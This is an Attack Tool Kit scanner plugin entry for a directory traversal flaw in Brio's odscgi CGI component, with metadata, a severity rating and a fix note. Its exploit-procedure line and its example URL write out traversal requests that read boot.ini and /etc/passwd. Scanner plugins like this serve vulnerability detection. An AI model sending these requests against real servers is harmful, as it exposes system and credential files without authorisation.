Brio Windows odscgi directory traversal 1.0
 
Plugin ID337
Plugin nameBrio Windows odscgi directory traversal
Plugin filenameBrio Windows odscgi directory traversal.plugin
Plugin filesize2303 bytes
Plugin familyCGI
Plugin created nameMarc Ruef
Plugin created emailmarc.ruef at computec.ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2005/01/09
Plugin version1.0
Plugin protocoltcp
Plugin port80
Plugin procedure exploitopen|send GET /ods-cgi/odscgi?HTMLFile=../../../../../../../../../../../../../../../boot.ini HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *[operating systems]*
Plugin exploit accuracy98
Plugin commentThe NASL script is Copyright (C) 2003 Chris Foster
Bug produced nameBrio
Bug produced webhttp://www.brio.com
Bug affectedBrio
Bug vulnerability classDirectory Traversal
Bug descriptionBrio a popular web application interface has a directory traversal in the component 'odscgi'. An attacker may exploit this flaw to read arbitrary files on the remote host by submitting a URL like: http://www.example.com/ods-cgi/odscgi?HTMLFile=../../../../../../etc/passwd
Bug solutionCheck www.brio.com for updated software.
Bug fixing timeApprox. 1 hour
Bug exploit availabilityYes
Bug remoteYes
Bug localYes
Bug severityHigh
Bug popularity3
Bug simplicity8
Bug impact8
Bug risk6
Bug Nessus riskMedium
Bug check toolsNessus can check this flaw with the plugin 15849 (Brio Unix Directory Traversal).
Source Nessus ID15849
Source LiteratureHacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.http://www.computec.ch

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.